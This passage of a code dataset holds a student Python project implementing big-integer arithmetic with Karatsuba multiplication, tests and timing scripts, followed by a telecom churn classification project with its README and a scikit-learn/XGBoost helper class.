\"\"\"\r\n Sobrecarga del operador <= me indica si other es mayor o igual que self\r\n \"\"\"\r\n if self.Complemento==False and other.Complemento==True:return 
True\r\n elif self.Complemento==True and other.Complemento==False:return False\r\n elif self.int() <= other.int(): return True \r\n return False\r\n \r\n def __gt__(self,other):\r\n \"\"\"\r\n Esta sobrecarga > sirve para mostrar \r\n \"\"\"\r\n if self.Complemento==False and other.Complemento==True: return True\r\n elif self.Complemento==True and other.Complemento==False:return False\r\n elif self.int() > other.int():return True \r\n return False \r\n\r\n def __repr__(self):\r\n \"\"\"\r\n aprovecha la funcion int para mostrar los valores por string\r\n \"\"\"\r\n return f\"(Valor: {self.show_number()}) (Base:{self.base}) (Max:10 **{self.size}) \\n\"#{self.ListaN}\r\n \r\n def __lshift__(self,positions):\r\n \"\"\"\r\n Mueve todos los digitos a la izquierda <<\r\n \"\"\"\r\n if not isinstance(positions,int): raise Exception(\"positions no es un int\") \r\n if positions < 0: raise Exception(f\"El entero {positions} no es positivo\") \r\n aux = copy.copy(self)\r\n list = []\r\n list = aux.ListaN + [0] * positions\r\n aux.ListaN=list[len(list)-self.size:len(list)]\r\n return aux\r\n def __rshift__(self,positions):\r\n \"\"\"\r\n Mueve todos los digitos a la derecha >>\r\n \"\"\"\r\n if not isinstance(positions,int): raise Exception(\"positions no es un int\") \r\n if positions < 0: raise Exception(f\"El entero {positions} no es positivo\") \r\n aux = copy.copy(self)\r\n list=[]\r\n list = [0]* positions + aux.ListaN \r\n aux.ListaN = list[0:self.size]\r\n return aux \r\n \r\n def __eq__(self, other):\r\n return self.int() == other.int()\r\n \r\n def Verificaciones(self,other):\r\n if not isinstance(other,NumC): raise Exception(f\"other no es tipo Num\") \r\n if not self.base == other.base: raise Exception(f\"La base self {self.base} != La base other {other.base}\")\r\n return True\r\n \r\n def __add__(self,other):\r\n \"\"\"\r\n suma de dos numeros de la propia clase Numero, esta toma caracter(int) por caracter(int) de atras hacia delante\r\n y los suma, tambien se acarrea si es necesario\r\n \"\"\"\r\n self.Verificaciones(other)\r\n def suma():\r\n \r\n Residuo=0#lleva los decimales centenas ... 
que superen la capacidad de la respectiva unidad\r\n suma=0\r\n new=[] \r\n for i in range(15,self.size-max(len(other),len(self))-1,-1):\r\n suma = self[i] + other[i]\r\n suma += Residuo\r\n if suma >= self.base:\r\n if i == self.size-max(len(other),len(self)):\r\n new.append(suma-self.base)\r\n new.append(suma//self.base)\r\n else:\r\n new.append(suma-self.base)\r\n Residuo = suma//self.base\r\n else:\r\n new.append(suma)\r\n Residuo = 0\r\n new = new[::-1]\r\n if self.Complemento == True or other.Complemento == True: #Aqui verifico si alguno de los numeros es negativo\r\n if new[1] == self.base-1: return NumC(new[len(new)-self.size:len(new)],self.base,True)# si el resultado es negativo\r\n else: return NumC(new[len(new)-self.size:len(new)],self.base)\r\n return NumC(new,self.base)\r\n return self.F_cache(suma,other.int(),\"+\")\r\n def __mul__ (self,other):\r\n \"\"\"\r\n Funcion encargada de multiplicar de la forma ,suma de self una cantidad de veces other despues los voy\r\n acumulando para el resultado final\r\n \"\"\"\r\n valor=other.show_number()\r\n def mult():\r\n self.Verificaciones(other)\r\n resultado = NumC(0,self.base)#Este Num guarda la suma de cada multiplicacion que se hace\r\n resultado_final = NumC(0,self.base)\r\n self_copy = copy.copy(self)\r\n aux=copy.copy(other)\r\n if other.Complemento: aux = copy.copy(~other) #estos dos if verifican si alguno de los numeros es negativo\r\n if self.Complemento: self_copy = ~self_copy #y si encuentra uno lo pasa a positivo\r\n contador = 0\r\n Valor = str(aux.int())\r\n Valor = Valor[::-1]\r\n for i in Valor: #De aqui obtengo la cantidad de veces que será sumado self_copy \r\n aux = NumC(i,self.base) \r\n while aux > NumC(0,self.base):\r\n aux -= NumC(1,self.base)\r\n resultado += self_copy \r\n resultado = resultado << contador \r\n resultado_final += resultado\r\n resultado = NumC(0,self.base)\r\n contador+=1\r\n if (other.Complemento and self.Complemento==False) or (other.Complemento==False and self.Complemento):\r\n return ~resultado_final \r\n else:\r\n return resultado_final \r\n return self.F_cache(mult,valor,\"*\")\r\n \r\n def __floordiv__(self,other):\r\n \"\"\"\r\n Esta funcion es para la division, Se usa un contador para ver cuantas veces se tiene que sumar other \r\n para que sea menor si no se puede llegar a ser igual que self,o igual si se puede operador // \r\n \"\"\" \r\n valor=other.show_number()\r\n def div(): \r\n self.Verificaciones(other)\r\n self_copy = copy.copy(self)\r\n aux = copy.copy(other)\r\n other_copy = copy.copy(other)\r\n contador=NumC(0,self.base)\r\n if other.Complemento:\r\n aux = copy.copy(~other)\r\n other_copy = copy.copy(~other)\r\n if self.Complemento:\r\n self_copy = copy.copy(~self_copy)\r\n while aux <= self_copy:\r\n if aux <= self_copy:\r\n contador += NumC(1,self.base)\r\n aux += other_copy\r\n if (other.Complemento and self.Complemento==False) or (other.Complemento==False and self.Complemento):\r\n return ~contador \r\n else:\r\n return contador\r\n return self.F_cache(div,valor,\"//\")\r\n \r\n def __mod__(self,other):\r\n \"\"\"\r\n Sobrecarga del operador % retorna el mod de self / other \r\n \"\"\"\r\n self.Verificaciones(other)\r\n return self-(self//other)*other\r\n \r\n \r\n def __pow__(self,other):\r\n \"\"\"\r\n Sobrecarga del operador ** aqui se multiplica self cantidad de veces other\r\n \"\"\"\r\n valor = other.show_number()\r\n def pow():\r\n self.Verificaciones(other)\r\n self_copy = copy.copy(self)\r\n aux = copy.copy(other)\r\n other_copy = copy.copy(other)\r\n 
resultado=NumC(1,self.base)\r\n if other.Complemento: raise(\"La sobrecarga division x**n no sirve con n negativos\")\r\n while aux > NumC(0,self.base):\r\n resultado = resultado * self_copy\r\n aux -= NumC(1,other.base)\r\n return resultado\r\n return self.F_cache(pow,valor,\"**\")\r\n\r\n def __sub__(self,other):\r\n \"\"\"\r\n Algoritmo consiste en la implementacion de la resta clasica\r\n \"\"\"\r\n valor = other.show_number()\r\n def sub():\r\n self.Verificaciones(other)\r\n return self + ~other\r\n return self.F_cache(sub,valor,\"~\")\r\n \r\n def F_cache(self,func,other,operador):\r\n \"\"\"\r\n Funcion de controlar, aqui se establece el cache para cada objeto\r\n \"\"\"\r\n find=f\"{other}{operador}\"\r\n if find in self.cache:\r\n return self.cache[find]\r\n else:\r\n self.cache[find]=func()\r\n return self.cache[find]"
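\r\n\r\nif __name__ == \"__main__\":\r\n    # Illustrative sketch (an addition, not part of the original assignment):\r\n    # shows how F_cache memoizes repeated operations on the same operands.\r\n    a = NumC(1234)\r\n    b = NumC(56)\r\n    print(a + b)  # computed, then stored in a.cache under the key \"56+\"\r\n    print(a + b)  # served straight from a.cache, without recomputing"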
},
{
"alpha_fraction": 0.46720001101493835,
"alphanum_fraction": 0.5381333231925964,
"avg_line_length": 40.65909194946289,
"blob_id": "6449ea25d794ad5a6423a5a5eb1280c75ffc14bc",
"content_id": "241168651109aa52e6a60652d05460e9cfb4a32a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1876,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 44,
"path": "/Karatsuba/src/Main.py",
"repo_name": "AnZuCa/Karatsuba",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nTrabajo Karatsuba\r\nAutores:\r\nBraslyn Rodriguez Ramirez (08:00 am) ID:\r\nAndres Zuñiga Calderon(10:00am) ID:402430799\r\ngroup:04-08am\r\n\"\"\"\r\n\r\nfrom Num import*\r\nfrom Knum import *\r\nimport timeit\r\n\r\nif __name__==\"__main__\":\r\n \"\"\"\r\n Pequeño main donde se muestran los resultados de Num y Knum\r\n \"\"\"\r\n print(\"Sistema implementado por los Estudiantes\")\r\n print(\"Andres Zuñiga Calderon(10am) y Braslyn Rodriguez(08am)\")\r\n print(\"Grupo 04-08\")\r\n print(\"************************Clase Num*************************\")\r\n Num1=Num(70000,10)\r\n Num2=Num(10000,10)\r\n print(f\"Num({Num1.show_number()}) + Num({Num2.show_number()}) = {Num1+Num2}\")\r\n print(f\"Num({Num1.show_number()}) + ~ Num({Num2.show_number()}) = {Num1 + ~Num2}\")\r\n print(f\"Num({Num1.show_number()}) * Num({Num2.show_number()}) = {Num1 * Num2}\")\r\n print(f\"Num({Num1.show_number()}) // Num({Num2.show_number()}) = {Num1 // Num2}\")\r\n print(f\"Num({Num1.show_number()}) % Num({Num2.show_number()}) = {Num1 % Num2}\")\r\n print(f\"~Num({Num1.show_number()}) = {~Num1}\")\r\n Num1=Num(70,10)\r\n Num2=Num(10,10)\r\n print(f\"Num({Num1.show_number()}) ** Num({Num2.show_number()}) = {Num1 ** Num2}\")\r\n print()\r\n print(\"************************Clase Knum*************************\")\r\n Num1=Knum(70000,10)\r\n Num2=Knum(10020,10)\r\n print(f\"Knum({Num1.show_number()}) + Knum({Num2.show_number()}) = {Num1+Num2}\")\r\n print(f\"Knum({Num1.show_number()}) + ~ Knum({Num2.show_number()}) = {Num1 + ~Num2}\")\r\n print(f\"Knum({Num1.show_number()}) * Knum({Num2.show_number()}) = {Num1 * Num2}\")\r\n print(f\"Knum({Num1.show_number()}) // Knum({Num2.show_number()}) = {Num1 // Num2}\")\r\n print(f\"Knum({Num1.show_number()}) % Knum({Num2.show_number()}) = {Num1 % Num2}\")\r\n print(f\"~Knum({Num2.show_number()}) = {~Num2}\")\r\n Num1=Knum(70,10)\r\n Num2=Knum(10,10)\r\n print(f\"Knum({Num1.show_number()}) ** Knum({Num2.show_number()}) = {Num1 ** Num2}\")"
},
{
"alpha_fraction": 0.485241174697876,
"alphanum_fraction": 0.5226781964302063,
"avg_line_length": 33.10256576538086,
"blob_id": "3ac1e42eacefb8092a2bb5c81bdc62b763a729a7",
"content_id": "c628faeb5587acb1542bb43f45a558186bbf82d4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1390,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 39,
"path": "/Karatsuba/src/CheckNum.py",
"repo_name": "AnZuCa/Karatsuba",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nTrabajo Karatsuba\r\nAutores:\r\nBraslyn Rodriguez Ramirez (08:00 am) ID:402420750\r\nAndres Zuñiga Calderon(10:00am) ID:402430799\r\ngroup:04-08am\r\n\"\"\"\r\nclass CheckNum:\r\n @staticmethod\r\n def Check(num,base):\r\n \"\"\"verifica si un entero o string o lista esta en la base correspondiente\"\"\"\r\n cadena=\"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\r\n try: \r\n if type(num)==int:\r\n aux = str(num)\r\n else:\r\n aux = num\r\n for i in range(len(aux)):\r\n if str(aux[i]).isdigit():\r\n int(str(cadena[int(aux[i])]),base) \r\n else:\r\n int(aux[i],base) \r\n except ValueError:\r\n raise Exception(f\"El numero {num} no esta en la base {base}\")\r\n return True \r\n @staticmethod\r\n def ConvertListtoint(num):\r\n \"\"\"Convierte una lista a digitos tipo int adentro\"\"\"\r\n newlist=[]\r\n for i in range(len(num)):\r\n newlist.append(int(str(num[i]),16))\r\n return newlist\r\n def Size(num):\r\n \"\"\"Verifica si una lista o un numero son de tamaño menor que 16\"\"\"\r\n if type(num)==list:\r\n if len(num)>16: raise Exception(f\"El numero {num} excede el tama?o maximo que es 16\")\r\n else:\r\n if len(str(num))>16: raise Exception(f\"El numero {num} excede el tama?o maximo que es 16\")\r\n return True \r\n "
},
{
"alpha_fraction": 0.5196619033813477,
"alphanum_fraction": 0.5332598090171814,
"avg_line_length": 31.085365295410156,
"blob_id": "7f15c4334c1ba20aa9704bdc464ad2d599a4686d",
"content_id": "1ff2c78ec5aea3843138894d0abb5111a2f0e451",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2722,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 82,
"path": "/Karatsuba/src/read_test_cases.py",
"repo_name": "AnZuCa/Karatsuba",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nTrabajo Karatsuba\r\nAutores:\r\nBraslyn Rodriguez Ramirez (08:00 am) ID:\r\nAndres Zuñiga Calderon(10:00am) ID:402430799\r\ngroup:04-08am\r\nMaterial obtenido del profesor Carlos Loria Saenz\r\n\"\"\"\r\nimport time\r\nimport sys\r\nfrom Num import *\r\n\r\n\r\ndef lectura(archivo, llave = None):#utilizo aqui el identificador para saber el tipo de operacion que voy a realizar\r\n \"\"\"\r\n Funcion encargada de leer los .csv de prueba recibe un archivo y un tipo de llave \r\n para especificar la operación que quiero realizar\r\n \"\"\"\r\n print(\"*** Reading Test Cases ***\")\r\n cases = None\r\n total = 0\r\n failed = 0\r\n passed = 0\r\n given = Num(0)\r\n with open(archivo, \"r\") as file: #aqui leo el csv\r\n lines = file.read()\r\n cases = lines.split(\"\\n\")\r\n total = len(cases)\r\n start = time.time()\r\n for case in cases:\r\n # Skips comments\r\n if case.startswith(\"#\"): \r\n continue\r\n (case_num, xval, yval, expected) = (int(n) for n in case.split(\";\"))\r\n print(f\"Processing case {case_num}\")\r\n if llave == \"+\":\r\n expected= Num(expected)\r\n given = Num(xval) + Num(yval) \r\n elif llave == \"-\":\r\n expected= Num(expected)\r\n given = Num(xval)- Num(yval)\r\n elif llave == \"*\":\r\n expected= Num(expected)\r\n given = Num(xval)* Num(yval)\r\n elif llave == \"//\":\r\n expected= Num(expected)\r\n given = Num(xval) // Num(yval)\r\n elif llave == \"%\":\r\n expected= Num(expected)\r\n given = Num(xval)% Num(yval)\r\n elif llave == \"**\":\r\n expected= Num(expected)\r\n given = Num(xval)** Num(yval)\r\n else:#caso si no se especifica una llave valida\r\n expected = Num(expected)\r\n \r\n if given != expected:\r\n print(f\"*** Case {case_num} failed! {given} != {expected} ***\")\r\n failed += 1\r\n else:\r\n print(f\"*** Case {case_num} passes! ***\")\r\n passed += 1\r\n \r\n end = time.time()\r\n print(\"\\n*** Test Case Result ***\")\r\n print(f\"Total cases={total}. Failed={failed} Passed={passed}\")\r\n print(f\"Duration:{(end -start):.4f}sec\")\r\n\r\nif __name__ == \"__main__\":\r\n \"\"\"\r\n para una mayor facilidad se debe enviar tambien con los parametros la llave con la que se va a ejecutar el csv \r\n \"\"\"\r\n llave = None\r\n argumento = sys.argv \r\n if len(argumento) == 1: #No se envio ningun parametro csv se usa por defecto test_01.csv\r\n archivo = \"../test/test_01.csv\"\r\n elif len(argumento) == 2: #se envio un parametro csv\r\n archivo = argumento[1]\r\n else:\r\n archivo = argumento[1]\r\n llave = argumento[2]\r\n lectura(archivo,llave) \r\n "
},
{
"alpha_fraction": 0.49635037779808044,
"alphanum_fraction": 0.5568300485610962,
"avg_line_length": 26.176469802856445,
"blob_id": "a0e3d881649ea618298ac28023d32ba247558d8a",
"content_id": "e7d38cf010fb16b2c2084559c4f1c22ed4e87c32",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 959,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 34,
"path": "/Karatsuba/src/Prueba_cache.py",
"repo_name": "AnZuCa/Karatsuba",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nTrabajo Karatsuba\r\nAutores:\r\nBraslyn Rodriguez Ramirez (08:00 am) ID:402420750\r\nAndres Zuñiga Calderon(10:00am) ID:402430799\r\ngroup:04-08am\r\n\"\"\"\r\n\r\nfrom Num import *\r\nfrom Num_con_cache import *\r\nimport timeit\r\n\r\ndef tocoma(n):\r\n \"\"\"\r\n Esta funcion remplaza un punto por una coma\r\n \"\"\"\r\n return str(n).replace(\".\",\",\")\r\n\r\nif __name__ == \"__main__\":\r\n \"\"\"\r\n Aqui se prueba el cache para ver si llega a ser mas eficiente que la suma de la clase Num\r\n \"\"\"\r\n Num1 = Num(700) \r\n Num2 = Num(1000)\r\n Num3 = NumC(700)\r\n Num4 = NumC(1000)\r\n with open(\"../data/Analisis_De_cache.csv\", \"w\") as file:\r\n file.write(\"n;Num;NumC\\n\") \r\n for i in range(10):\r\n print(\"nueva interaccion\")\r\n time_Num = timeit.timeit(\"Num1 + Num2\", globals=globals(), number=10)\r\n time_NumC = timeit.timeit(\"Num3 + Num4\", globals=globals(), number=10)\r\n file.write(f\"{i};{tocoma(time_Num)};{tocoma(time_NumC)}\\n\")\r\n print(\"Listo!\") "
},
{
"alpha_fraction": 0.4655172526836395,
"alphanum_fraction": 0.6034482717514038,
"avg_line_length": 10,
"blob_id": "a001a8fa09f7d69efb9b43c56a67605b2a2f35a0",
"content_id": "a8010eddc84e46fb3da1cd9da48f7c449a637798",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 58,
"license_type": "no_license",
"max_line_length": 14,
"num_lines": 5,
"path": "/Karatsuba/README.txt",
"repo_name": "AnZuCa/Karatsuba",
"src_encoding": "ISO-8859-10",
"text": "Students:\r\n\tBraslyn Rodriguez (08am)\r\n\tAndres Zuņiga Calderon(10am)\r\nGroup:\r\n\t04-08am"
},
{
"alpha_fraction": 0.4712643623352051,
"alphanum_fraction": 0.5376756191253662,
"avg_line_length": 26.296297073364258,
"blob_id": "b2d3a4a0d2485fd7feed77f1311e35184376e809",
"content_id": "563bbee7b50120fcd11bf90ec044bd7cfd62913b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 783,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 27,
"path": "/Karatsuba/src/Tiempo_KaratsubayNatural.py",
"repo_name": "AnZuCa/Karatsuba",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nTrabajo Karatsuba\r\nAutores:\r\nBraslyn Rodriguez Ramirez (08:00 am) ID:402420750\r\nAndres Zuñiga Calderon(10:00am) ID:402430799\r\n\"\"\"\r\n\r\nfrom Num import *\r\nfrom Knum import *\r\nimport timeit\r\n\r\ndef tocoma(n):\r\n \"\"\"\r\n Esta funcion remplaza un punto por una coma\r\n \"\"\"\r\n return str(n).replace(\".\",\",\")\r\n\r\nif __name__ == \"__main__\":\r\n \r\n with open(\"../data/Analisis_De_tiempo1.csv\", \"w\") as file:\r\n file.write(\"n;Num;Knum\\n\") \r\n for i in range(600):\r\n print(\"nueva interaccion\")\r\n time_Num = timeit.timeit(\"Num(70000) * Num(10000)\", globals=globals(), number=1)\r\n time_Knum = timeit.timeit(\"Knum(70000) * Knum(10000)\", globals=globals(), number=1)\r\n file.write(f\"{i};{tocoma(time_Num)};{tocoma(time_Knum)}\\n\")\r\n print(\"Listo!\") \r\n \r\n \r\n "
}
] | 10 |
wplam107/classification_project | https://github.com/wplam107/classification_project | b3063c81c49b228999cc79f1eab55fad93f27d0a | 8ffbba7f166293e0b2886a910b6f8a415bd7b52e | 8119f30b5b2067be392820e7e09b2fb4b57b3e16 | refs/heads/master | 2021-02-28T09:38:33.065864 | 2020-05-13T15:52:44 | 2020-05-13T15:52:44 | 245,682,563 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7853569984436035,
"alphanum_fraction": 0.7953615188598633,
"avg_line_length": 58.43243408203125,
"blob_id": "1f36ea2ed7f0070ce294f5c7f1bb8f28aa6d008b",
"content_id": "38d229efaf932a68cb10cb9f084c7f74665a3b55",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2199,
"license_type": "no_license",
"max_line_length": 170,
"num_lines": 37,
"path": "/README.md",
"repo_name": "wplam107/classification_project",
"src_encoding": "UTF-8",
"text": "# Classification Project - Telecom Churn Rates\n- Wayne Lam\n- Object Oriented Approach to Classification Project (classification_funcs.py)\n\n## Goal\n- To find predictors for Telecom Churn Rates\n- To create a model to determine if a customer is to drop service plan (churn) based on various factors (VM, usage, etc.)\n\n## Data\n- From https://www.kaggle.com/becksddf/churn-in-telecoms-dataset\n- Evaluating features (variables) in telecom service that correlate with churn (unsubscribing from a service)\n- 20 initial features\n- 3333 data points\n- High class (churn vs. no churn) imbalance with churn being approximately 14.5% and not churn 85.5% of data points\n\n## EDA / Data Visualization\n- Several fairly prominent features: voicemail messages, total minutes across day/evening/night/international, total customer service calls\n- Colinearity between total minutes and total charges across day/evening/night/international\n- Having voicemail messages and not having voicemail messages also strongly correlated with churn rate, chi-squared well over critical value from alpha = 0.05\n\n\n\n\n## Feature Engineering and Selection\n- Features removed include phone number (identifying information/unnecessary), total charges (except international) removed by XGBoost (scores of 0 in feature importance)\n- Categorical variables area code and state have been dummied with the initial features dropped\n\n## Model Selection and Evaluation\n- F1 score for evaluation since accuracy may not reflect predictive strength of a model due to high class imbalance\n- XGBoost w/GridSearch CV, RandomForest w/GridSearch CV, AdaBoost used\n- With XGBoost w/GridSearch CV, initial pass used to remove \"unimportant\" features and second pass used for tuning hyperparameters\n- XGBoost had the highest F1 score: 0.854\n\n## Insights and future investigation\n- Tiered payment plan (possible unlimited plan), higher minutes increased churn rate\n- Possibly opt in voicemail plan (maybe default plan) since excess charge for individuals who do not use voicemail may turn to other plans\n- Future considerations: VM plan and if customer uses it, text and data plans (if the data is available)\n"
},
{
"alpha_fraction": 0.5335727334022522,
"alphanum_fraction": 0.5404160022735596,
"avg_line_length": 36.846153259277344,
"blob_id": "310ef7af063142241df4c94216717f9c68118e1f",
"content_id": "7409e5320e3a8cc5fdddb633814eef3dc2d9c8e6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14759,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 390,
"path": "/classification_funcs.py",
"repo_name": "wplam107/classification_project",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport sklearn.preprocessing as preprocessing\nfrom sklearn.model_selection import train_test_split\nimport xgboost as xgb\nfrom sklearn import svm\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import f1_score, accuracy_score\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\nfrom sklearn.utils import resample\nfrom imblearn.over_sampling import SMOTE\nfrom imblearn.under_sampling import TomekLinks\nimport scipy.stats as stats\n\nclass ModelDF:\n def __init__(self, df, cat_features=[], target=''):\n self.df = df.copy()\n self.cat_features = cat_features\n self.target = target\n\n def cat_and_drop(self):\n print('---')\n try:\n for feat in self.cat_features:\n self.df[feat] = self.df[feat].astype('category')\n self.df = self.df.join(pd.get_dummies(self.df[feat], prefix='{}'.format(feat), drop_first=True))\n self.df.drop(columns=feat, inplace=True)\n print('Added dummies for and dropped \"{}\"'.format(feat))\n print('Now has {} columns'.format(self.df.shape[1]))\n except:\n print('No dummies added and no columns dropped')\n\n def _check_imbalance(self, col):\n '''\n Check class imbalance of target or feature\n Parameters\n ----------\n col = str, column to check class imbalance\n '''\n return self.df[col].value_counts(normalize=True), self.df[col].value_counts()\n\n def info(self):\n print('---')\n print('Shape: {}'.format(self.df.shape))\n for i in range(len(self.df.dtypes.unique())):\n print('There is/are {} {} feature(s)'.format(self.df.dtypes.value_counts()[i],\n self.df.dtypes.value_counts().index[i]))\n a, b = self._check_imbalance(col=self.target)\n print('---')\n print('Target Variable Class Ratios:\\n{}'.format(a))\n print('Target Variable Counts:\\n{}'.format(b))\n\n def new_cat(self, new_feat, old_feat, bin_point=0, equality='e'):\n '''\n Create new categorical feature from old feature\n Parameters\n ----------\n new_feat : str, name of new feature to be created\n old_feat : str, reference feature\n bin_point : int or float, point of binning, default 0\n equality : str, 'ge' is >=, 'g' is >, 'e' (default) is ==, 'le' is <=, 'l' is <\n '''\n if equality == 'e':\n self.df[new_feat] = np.where(self.df[old_feat] == bin_point, 1, 0)\n elif equality == 'ge':\n self.df[new_feat] = np.where(self.df[old_feat] >= bin_point, 1, 0)\n elif equality == 'g':\n self.df[new_feat] = np.where(self.df[old_feat] > bin_point, 1, 0)\n elif equality == 'le':\n self.df[new_feat] = np.where(self.df[old_feat] <= bin_point, 1, 0)\n else:\n self.df[new_feat] = np.where(self.df[old_feat] < bin_point, 1, 0)\n\n def preprocess(self, major, minor, test_size=0.2, random_state=0, samp_type=None, scaler=None):\n '''\n Get train-test split and resample data\n Parameters\n ----------\n test_size : float between 0 and 1, default = 0.2\n random_state : int, default = 0\n samp_type : str or None\n 'up' 'down' 'smote' 'tomek'\n scaler : str or None\n 'standard' 'minmax'\n '''\n self._tts(test_size=test_size, random_state=random_state)\n self._resample(samp_type=samp_type, random_state=random_state, major=major, minor=minor)\n self._scaler(scaler=scaler)\n\n\n def _getXy(self, X=None, y=None):\n '''\n Get X (features) and y (target)\n Parameters\n ----------\n X : List of strings\n features, default uses all columns\n y : Target variable\n default uses self.target\n '''\n if 
X is None:\n            self.X = self.df.drop(self.target, axis=1)\n        else:\n            self.X = self.df[X]\n        if y is None:\n            self.y = self.df[self.target]\n        else:\n            self.y = self.df[y]\n        print('X and y acquired')\n\n    def _tts(self, test_size=0.2, random_state=0):\n        '''\n        Train test split on DataFrame\n        Parameters\n        ----------\n        test_size : float between 0 and 1, default = 0.2\n        random_state : int, default = 0\n        '''\n        self._getXy()\n        self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(\n            self.X, self.y, test_size=test_size, random_state=random_state)\n        print('Data has been split into train and test sets')\n\n    def _resample(self, major, minor, random_state=0, samp_type=''):\n        '''\n        Resample for binary class imbalance\n        Parameters\n        ----------\n        samp_type : str\n            'up' 'down' 'smote' 'tomek'\n        '''\n        df = pd.concat([self.X_train, self.y_train], axis=1)\n        major, minor = df[df[self.target] == major], df[df[self.target] == minor]\n\n        if samp_type == 'up':\n            print('Data upsampled')\n            self._simple_resample(minor, major, random_state)\n        elif samp_type == 'down':\n            print('Data downsampled')\n            self._simple_resample(major, minor, random_state)\n        elif samp_type == 'smote':\n            print('SMOTE performed')\n            self._smote_data(random_state)\n        elif samp_type == 'tomek':\n            print('Tomek Links performed')\n            self._tomek_data()\n        else:\n            print('No Resampling performed')\n\n    def _simple_resample(self, change, goal, random_state):\n        resampled = resample(change, replace=True, n_samples=len(goal), random_state=random_state)\n        joined = pd.concat([goal, resampled])\n        self.X_train, self.y_train = joined.drop(self.target, axis=1), joined[self.target]\n\n    def _smote_data(self, random_state):\n        sm = SMOTE(random_state=random_state)\n        self.X_train, self.y_train = sm.fit_sample(self.X_train, self.y_train)\n\n    def _tomek_data(self):\n        tl = TomekLinks()\n        self.X_train, self.y_train = tl.fit_sample(self.X_train, self.y_train)\n\n    def _scaler(self, scaler=None):\n        # Note: fit_transform is not in-place; assign the result back, wrapped\n        # as a DataFrame so feature names survive for _push_out\n        if scaler == 'standard':\n            scale = StandardScaler()\n            self.X_train = pd.DataFrame(scale.fit_transform(self.X_train),\n                                        columns=self.X_train.columns, index=self.X_train.index)\n            self.X_test = pd.DataFrame(scale.transform(self.X_test),\n                                       columns=self.X_test.columns, index=self.X_test.index)\n        elif scaler == 'minmax':\n            scale = MinMaxScaler()\n            self.X_train = pd.DataFrame(scale.fit_transform(self.X_train),\n                                        columns=self.X_train.columns, index=self.X_train.index)\n            self.X_test = pd.DataFrame(scale.transform(self.X_test),\n                                       columns=self.X_test.columns, index=self.X_test.index)\n        else:\n            print('No Scaling performed')\n    \n    def _push_out(self):\n        '''\n        Removal of features with a score of 0 importance\n        '''\n        push = self.xgb_model.fit(self.X_train, self.y_train)\n        worthless = [ self.X_train.columns[idx] for idx, val in enumerate(push.feature_importances_) if val == 0 ]\n        self.X_train = self.X_train.drop(columns=worthless)\n        self.X_test = self.X_test.drop(columns=worthless)\n        num_pushed = len(worthless)\n        print('---')\n        print('Number of Features Removed: {}'.format(num_pushed))\n\n    def get_xgb(self, gs=False, params=None, push_out=False):\n        '''\n        Instantiate and fit XGBoost model object with or without GridSearch to train set\n        Default model as .xgb_model and GridSearch model as .gs_xgb\n\n        Parameters\n        ----------\n        gs : bool\n            True = XGBoost with GridSearch CV\n            False (default) = default XGBoost\n        params : dictionary\n            parameters to run through GridSearch CV\n        push_out : bool\n            True = remove features with no importance.\n            Warning: alters X_train and X_test features\n        '''\n        if gs == True:\n            xgb_model = xgb.XGBClassifier()\n            self.gs_xgb = GridSearchCV(\n                estimator=xgb_model,\n                param_grid=params,\n                scoring='f1',\n                n_jobs=-1,\n                verbose=1,\n                cv=5)\n            self.gs_xgb.fit(self.X_train, self.y_train)\n            self.xgb_model = self.gs_xgb.best_estimator_\n            preds = self.xgb_model.predict(self.X_test)\n\n            test_f1 = f1_score(self.y_test, 
preds)\n test_acc = accuracy_score(self.y_test, preds)\n\n print(\"Accuracy: %f\" % (test_acc))\n print(\"F1: %f\" % (test_f1))\n print('Best Parameters:\\n{}'.format(self.gs_xgb.best_params_))\n\n if push_out == True:\n self._push_out()\n self.gs_xgb = GridSearchCV(\n estimator=xgb_model,\n param_grid=params,\n scoring='f1',\n n_jobs=-1,\n verbose=1,\n cv=5)\n self.gs_xgb.fit(self.X_train, self.y_train)\n self.xgb_model = self.gs_xgb.best_estimator_\n self.xgb_model.fit(self.X_train, self.y_train)\n\n preds = self.xgb_model.predict(self.X_test)\n\n test_f1 = f1_score(self.y_test, preds)\n test_acc = accuracy_score(self.y_test, preds)\n\n print(\"Accuracy After Push Out: %f\" % (test_acc))\n print(\"F1 After Push Out: %f\" % (test_f1))\n print('Best Parameters After Push Out:\\n{}'.format(self.gs_xgb.best_params_))\n\n else:\n self.xgb_model = xgb.XGBClassifier().fit(self.X_train, self.y_train)\n self.xgb_model.fit(self.X_train, self.y_train)\n \n if push_out == True:\n self._push_out()\n self.xgb_model.fit(self.X_train, self.y_train)\n\n preds = self.xgb_model.predict(self.X_test)\n\n test_f1 = f1_score(self.y_test, preds)\n test_acc = accuracy_score(self.y_test, preds)\n\n print(\"Accuracy: %f\" % (test_acc))\n print(\"F1: %f\" % (test_f1))\n \n def 